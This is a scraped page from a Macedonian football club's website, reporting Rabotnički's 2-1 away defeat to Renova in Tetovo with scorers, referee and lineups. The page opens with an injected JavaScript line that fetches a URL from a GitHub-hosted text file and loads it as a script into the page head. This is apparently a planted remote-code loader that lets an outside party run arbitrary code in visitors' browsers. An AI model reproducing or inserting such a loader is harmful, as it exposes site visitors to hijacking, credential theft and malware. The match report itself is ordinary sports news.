;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Пораз во последните моменти од Ренова (2-1)
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Пораз во последните моменти од Ренова (2-1)

Работнички доживеа пораз од 2-1 на гостувањето против Ренова во Тетово. Ремито беше блиску, тимот го делеа само неколку минути, но едно невнимание во одбраната во втората минута од судиското продолжение беше кобна и донесе пораз. Влатко Стојановски со удар со глава го совлада Божиновски, по центаршутот од десната страна.

Ренова прва поведе со голот на Лукас во 11.минута од натпреварот. Домаќините изведоа корнер од десната страна, Лукас шутираше со глава, топката удри во еден фудбалер, го смени правецот и заврши во мрежата на Божиновски.

По ова, се закани Кире Маркоски со шут од 20 метри, но беше за малку непрецизен.

Нафиу се обиде со удар од далечина, но исто така без ефект.

Во вториот дел, Работнички притисна за израмнување и успеа да стигне до него во 87.минута. Серџо јуниор нафрли од левата страна, го пронајде Николче Шаркоски осамен на вториот дирек, а тој пласираше во празната мрежа.

Но, и тоа не беше доволно за бод на ова тешко гостување. Ренова преку Влатко Стојановски постигна победнички гол во 92.минута од натпреварот.

РЕНОВА – РАБОТНИЧКИ 2-1 (1-0)

Градски стадион во Тетово. Судија: Јован Качевски (Струга). Стрелци: Лукас 11’, Стојановски 90’ (Ренова) – Шаркоски 87’ (Работнички).

РЕНОВА: Кобетиќ, Незири, Костов, Мишковски, Абдула, Јусуфи, Иљази, Лукас, Нухи, Гафури, Нафиу.

РАБОТНИЧКИ: Божиновски, Рашо, Митрев, Најдовски, Трајчевски, Дурански, Шаркоски, Петковски, Маркоски, Ангелов, Кировски.